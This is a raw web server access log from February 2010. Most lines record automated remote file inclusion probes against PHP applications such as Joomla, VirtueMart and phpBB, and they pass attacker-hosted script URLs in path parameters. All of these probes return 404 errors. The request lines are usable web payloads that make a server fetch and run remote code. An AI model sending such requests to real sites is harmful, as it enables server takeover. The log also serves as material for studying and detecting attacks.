155.101.44.48 - - [01/Feb/2010:04:52:10 -0800] "GET /errors.php?error=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:04:52:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:04:52:19 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:04:52:19 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:04:52:42 -0800] "GET /logs/access_100101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:04:52:48 -0800] "GET /logs/access_100101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:04:52:57 -0800] "GET /logs/access_100101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.88.4.141 - - [01/Feb/2010:04:54:30 -0800] "GET /logs//nullpo/hsList.php?subdir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:04:54:30 -0800] "GET /logs/access_090329.log%20%20//nullpo/hsList.php?subdir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:04:54:30 -0800] "GET /nullpo/hsList.php?subdir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.249.65.110 - - [01/Feb/2010:04:55:14 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.wirama.com"
66.249.65.120 - - [01/Feb/2010:04:55:14 -0800] "GET / HTTP/1.1" 200 916 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.wirama.com"
212.61.145.243 - - [01/Feb/2010:04:56:29 -0800] "GET /errors.php?error=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
212.61.145.243 - - [01/Feb/2010:04:56:30 -0800] "GET /logs/errors.php?error=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
72.29.90.115 - - [01/Feb/2010:04:59:37 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.qables.com/_private/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.wirama.com"
72.29.90.115 - - [01/Feb/2010:04:59:39 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.qables.com/_private/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:05:04:28 -0800] "GET /logs/access_090329.log//nullpo/hsList.php?subdir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.88.4.141 - - [01/Feb/2010:05:08:43 -0800] "GET /logs/access_090330.log//nullpo/hsList.php?subdir=http://213.186.58.150/Appz/id/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
94.124.120.47 - - [01/Feb/2010:05:16:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
94.124.120.47 - - [01/Feb/2010:05:16:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
94.124.120.47 - - [01/Feb/2010:05:16:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
94.124.120.47 - - [01/Feb/2010:05:16:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
94.124.120.47 - - [01/Feb/2010:05:17:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
94.124.120.47 - - [01/Feb/2010:05:17:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
174.37.162.130 - - [01/Feb/2010:05:19:10 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:05:19:10 -0800] "GET /logs/access_091201.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:05:19:10 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.239.23.19 - - [01/Feb/2010:05:20:13 -0800] "GET /logs//g4///bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:05:20:13 -0800] "GET /g4///bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:05:20:14 -0800] "GET /logs/access_090329.log//g4///bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.29 - - [01/Feb/2010:05:20:34 -0800] "GET /logs/access_090501.log HTTP/1.0" 200 5490289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:05:24:03 -0800] "GET /logs/access_090329.log///arcade.php?phpbb_root_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:05:24:03 -0800] "GET //arcade.php?phpbb_root_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:05:24:03 -0800] "GET /logs///arcade.php?phpbb_root_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:05:25:02 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:05:25:02 -0800] "GET /logs/access_091201.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:05:25:02 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:05:27:17 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:05:27:17 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:05:27:17 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:05:27:29 -0800] "GET /logs/access_090901.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:05:33:27 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:05:33:27 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:05:33:27 -0800] "GET /logs/access_090329.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:05:33:27 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:05:33:29 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:05:33:34 -0800] "GET /logs/access_090329.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:34 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:35 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:34:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:35:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:35:13 -0800] "GET /logs/access_091201.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:35:13 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:35:21 -0800] "GET /logs/access_100101.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.239.23.19 - - [01/Feb/2010:05:35:51 -0800] "GET /logs/access_090329.log%20%20///arcade.php?phpbb_root_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.19.177.19 - - [01/Feb/2010:05:36:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:05:36:34 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:37:59 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:37:59 -0800] "GET /logs/access_091201.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:37:59 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:05:38:06 -0800] "GET /logs/access_100101.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:05:40:49 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:05:40:49 -0800] "GET /logs/access_090901.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.19.168.8 - - [01/Feb/2010:05:40:49 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:41:15 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:41:15 -0800] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:41:15 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:41:26 -0800] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:41:27 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:41:27 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:43:36 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:43:36 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:43:36 -0800] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:44:26 -0800] "GET /logs/access_090330.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:45:07 -0800] "GET /logs/access_090330.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:51:40 -0800] "GET /logs/access_090329.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:05:52:26 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:52:26 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:52:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:52:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:52:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:52:35 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:53:25 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:53:25 -0800] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:53:25 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:53:26 -0800] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:53:34 -0800] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:05:53:35 -0800] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:54:03 -0800] "GET /logs/access_090329.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.250.255.243 - - [01/Feb/2010:05:56:44 -0800] "GET /jobs.html HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:05:56:50 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:56:50 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:56:50 -0800] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:56:56 -0800] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:05:57:14 -0800] "GET /logs/access_090601.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:06:04:03 -0800] "GET //write_comment_update.php?board_skin_path=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:06:04:03 -0800] "GET /logs/access_090731.log///write_comment_update.php?board_skin_path=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
86.109.170.73 - - [01/Feb/2010:06:04:03 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.undp.org.in/jobs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:05:39 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:05:39 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:05:39 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
